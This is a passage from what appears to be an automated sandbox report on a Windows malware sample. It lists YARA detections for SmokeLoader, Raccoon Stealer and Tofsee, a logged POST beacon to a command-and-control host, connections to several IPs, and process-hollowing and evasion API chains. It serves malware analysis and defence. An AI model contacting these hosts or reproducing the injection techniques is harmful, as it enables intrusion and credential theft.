PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-01-07T11:33:20.1626869Z||.||d5cdcec3-04df-404e-ba07-3240047c89f9||1152921505694348672||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                          Source: B3BA.exe, 0000002A.00000002.748298301.0000000003345000.00000004.00000001.sdmp | String found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: m9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
                          Source: unknown | HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qsmgbhufo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 160Host: host-data-coin-11.com
                          Source: unknown | HTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.6:49771 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.6:49792 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 104.21.38.221:443 -> 192.168.2.6:49863 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.6:49865 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.6:49879 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.6:49883 version: TLS 1.2

                          Key, Mouse, Clipboard, Microphone and Screen Capturing:

                          Yara detected SmokeLoader
                          Source: Yara match | File source: 0.2.0Cjy7Lkv1A.exe.4615a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 1.2.0Cjy7Lkv1A.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 13.1.ujhcrda.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 1.0.0Cjy7Lkv1A.exe.400000.6.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 12.2.ujhcrda.5315a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 13.2.ujhcrda.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 1.0.0Cjy7Lkv1A.exe.400000.4.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 1.1.0Cjy7Lkv1A.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 1.0.0Cjy7Lkv1A.exe.400000.5.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 00000001.00000002.419458917.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000005.00000000.404651747.0000000004151000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000001.00000002.419524662.00000000006A1000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara match | File source: 0000000D.00000002.471381402.0000000000460000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara match | File source: 0000000D.00000002.471483923.0000000000491000.00000004.00020000.sdmp, type: MEMORY

                          E-Banking Fraud:

                          Yara detected Raccoon Stealer
                          Source: Yara match | File source: 0000002C.00000002.738735707.0000000004DD0000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara match | File source: 0000002C.00000003.564687179.0000000004E70000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara match | File source: 0000002C.00000002.629029283.0000000000400000.00000040.00020000.sdmp, type: MEMORY

                          Spam, unwanted Advertisements and Ransom Demands:

                          Yara detected Tofsee
                          Source: Yara match | File source: 36.2.szdcdkt.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 39.2.svchost.exe.a50000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 36.2.szdcdkt.exe.670e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 19.2.A8FB.exe.550e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 36.2.szdcdkt.exe.eb0000.2.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 36.2.szdcdkt.exe.eb0000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 36.3.szdcdkt.exe.690000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 39.2.svchost.exe.a50000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 19.2.A8FB.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 36.2.szdcdkt.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 19.2.A8FB.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 19.3.A8FB.exe.570000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 00000024.00000003.507342269.0000000000690000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000013.00000002.499421318.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000024.00000002.511069227.0000000000EB0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000024.00000002.510317453.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000013.00000003.480122610.0000000000570000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000024.00000002.510779082.0000000000670000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000027.00000002.631897455.0000000000A50000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000013.00000002.501018079.0000000000550000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara match | File source: Process Memory Space: A8FB.exe PID: 4692, type: MEMORYSTR
                          Source: Yara match | File source: Process Memory Space: szdcdkt.exe PID: 2972, type: MEMORYSTR
                          Source: Yara match | File source: Process Memory Space: svchost.exe PID: 6780, type: MEMORYSTR

                          System Summary:

                          PE file has nameless sections
                          Source: 6674.exe.5.dr | Static PE information: section name:
                          Source: 6674.exe.5.dr | Static PE information: section name:
                          Source: 6674.exe.5.dr | Static PE information: section name:
                          Source: 6674.exe.5.dr | Static PE information: section name:
                          Source: 6674.exe.5.dr | Static PE information: section name:
                          Source: 6674.exe.5.dr | Static PE information: section name:
                          Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6188 -ip 6188
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Code function: 0_2_004114C1
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Code function: 0_2_004120FD
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Code function: 0_2_00412E5E
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Code function: 0_2_00411A05
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Code function: 0_2_00410F7D
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Code function: 0_2_0040C709
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Code function: 0_2_0040478E
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Code function: 0_2_00463253
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Code function: 0_2_004631FF
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Code function: 1_2_00402A5F
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Code function: 1_2_00402AB3
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Code function: 1_1_00402A5F
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Code function: 1_1_00402B2E
                          Source: C:\Users\user\AppData\Roaming\ujhcrda | Code function: 12_2_00533253
                          Source: C:\Users\user\AppData\Roaming\ujhcrda | Code function: 12_2_005331FF
                          Source: C:\Users\user\AppData\Roaming\ujhcrda | Code function: 13_2_00402A5F
                          Source: C:\Users\user\AppData\Roaming\ujhcrda | Code function: 13_2_00402AB3
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exe | Code function: 14_2_004027CA
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exe | Code function: 14_2_00401FF1
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exe | Code function: 14_2_0040158E
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exe | Code function: 14_2_004015A6
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exe | Code function: 14_2_004015BC
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exe | Code function: 14_2_00411065
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exe | Code function: 14_2_00412A02
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exe | Code function: 14_2_0040CAC5
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exe | Code function: 14_2_00410B21
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exe | Code function: 14_2_004115A9
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exe | Code function: 14_2_0208160C
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exe | Code function: 14_2_020815DE
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exe | Code function: 14_2_020815F6
                          Source: C:\Users\user\AppData\Local\Temp\7063.exe | Code function: 17_2_00410800
                          Source: C:\Users\user\AppData\Local\Temp\7063.exe | Code function: 17_2_00411280
                          Source: C:\Users\user\AppData\Local\Temp\7063.exe | Code function: 17_2_004103F0
                          Source: C:\Users\user\AppData\Local\Temp\7063.exe | Code function: 17_2_004109F0
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exe | Code function: 19_2_0040C913
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exe | Code function: 20_2_00D896F0
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeCode function: 20_2_00D80470
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeCode function: 20_2_00D80460
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeCode function: 20_2_04BCDE18
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeCode function: 20_2_04BC8DF8
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeCode function: 20_2_04BC8DE8
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeCode function: 20_2_04BC8658
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeCode function: 20_2_04D700F1
                          Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exeCode function: 36_2_0040C913
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 39_2_00A5C913
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeCode function: 42_2_02D7EC28
Source: C:\Users\user\AppData\Local\Temp\A8FB.exe | Code function: 19_2_00401280 ShellExecuteExW,lstrlenW,GetStartupInfoW,CreateProcessWithLogonW,WaitForSingleObject,CloseHandle,CloseHandle,GetLastError,GetLastError,VirtualAlloc,
Source: 0Cjy7Lkv1A.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 0Cjy7Lkv1A.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 0Cjy7Lkv1A.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8008.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8008.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8008.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8B25.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 1BCC.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 1BCC.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 1BCC.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 60C2.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 60C2.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 60C2.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 7063.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 7063.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 7063.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 7063.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: A8FB.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: A8FB.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: A8FB.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: A8FB.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 382E.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 382E.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 382E.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 382E.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ujhcrda.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ujhcrda.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ujhcrda.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: szdcdkt.exe.19.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: szdcdkt.exe.19.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: szdcdkt.exe.19.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: szdcdkt.exe.19.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Users\user\AppData\Local\Temp\B3BA.exe | Section loaded: mscorjit.dll
Source: 0Cjy7Lkv1A.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\SysWOW64\uuqefjyt\
Source: C:\Users\user\AppData\Local\Temp\7063.exe | Code function: String function: 004048D0 appears 460 times
Source: C:\Users\user\AppData\Local\Temp\A8FB.exe | Code function: String function: 0040EE2A appears 40 times
Source: C:\Users\user\AppData\Local\Temp\A8FB.exe | Code function: String function: 00402544 appears 53 times
Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Code function: String function: 00404D54 appears 44 times
Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Code function: 0_2_00460110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Code function: 1_2_00401962 Sleep,NtTerminateProcess,
Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Code function: 1_2_0040196D Sleep,NtTerminateProcess,
Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Code function: 1_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Code function: 1_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Code function: 1_2_00401A0B NtTerminateProcess,
Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Code function: 1_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Code function: 1_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Code function: 1_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Code function: 1_2_00402084 LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Code function: 1_2_00402491 NtOpenKey,
Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Code function: 1_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Code function: 1_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Code function: 1_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Code function: 1_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Code function: 1_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Code function: 1_1_00402084 LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Code function: 1_1_00402491 NtOpenKey,
Source: C:\Users\user\AppData\Roaming\ujhcrda | Code function: 12_2_00530110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
Source: C:\Users\user\AppData\Roaming\ujhcrda | Code function: 13_2_00401962 Sleep,NtTerminateProcess,
Source: C:\Users\user\AppData\Roaming\ujhcrda | Code function: 13_2_0040196D Sleep,NtTerminateProcess,
Source: C:\Users\user\AppData\Roaming\ujhcrda | Code function: 13_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\ujhcrda | Code function: 13_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
Source: C:\Users\user\AppData\Roaming\ujhcrda | Code function: 13_2_00401A0B NtTerminateProcess,
Source: C:\Users\user\AppData\Roaming\ujhcrda | Code function: 13_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\ujhcrda | Code function: 13_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\ujhcrda | Code function: 13_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\ujhcrda | Code function: 13_2_00402084 LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\ujhcrda | Code function: 13_2_00402491 NtOpenKey,
Source: C:\Users\user\AppData\Local\Temp\B3BA.exe | Code function: 20_2_04D7F5C0 NtUnmapViewOfSection,
Source: C:\Users\user\AppData\Local\Temp\B3BA.exe | Code function: 20_2_04D7F6A0 NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\A8FB.exe | Code function: 19_2_00408E26: CreateFileW,DeviceIoControl,CloseHandle,
Source: 0Cjy7Lkv1A.exe | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: 8008.exe.5.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: 1BCC.exe.5.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: 60C2.exe.5.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: 7063.exe.5.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: A8FB.exe.5.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: ujhcrda.5.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: szdcdkt.exe.19.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: 6674.exe.5.dr | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
Source: 8B25.exe.5.dr | Static PE information: Section: .didata ZLIB complexity 0.999523355577
Source: 9874.exe.5.dr | Static PE information: Section: .rsrc ZLIB complexity 0.996134750716
Source: 5126.exe.5.dr | Static PE information: Section: .rsrc ZLIB complexity 0.997770524618
Source: 6674.exe.5.dr | Static PE information: Section: ZLIB complexity 1.00044194799
Source: 6674.exe.5.dr | Static PE information: Section: ZLIB complexity 1.00537109375
Source: 0Cjy7Lkv1A.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe | Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\A8FB.exe | Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\ujhcrda
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@56/31@94/17
Source: C:\Users\user\AppData\Local\Temp\A8FB.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\A8FB.exe | Code function: 19_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe | Code function: 36_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 39_2_00A59A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
Source: C:\Users\user\AppData\Local\Temp\A8FB.exe | Code function: 19_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
Source: 0Cjy7Lkv1A.exe | Virustotal: Detection: 37%
Source: 0Cjy7Lkv1A.exe | ReversingLabs: Detection: 53%
Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
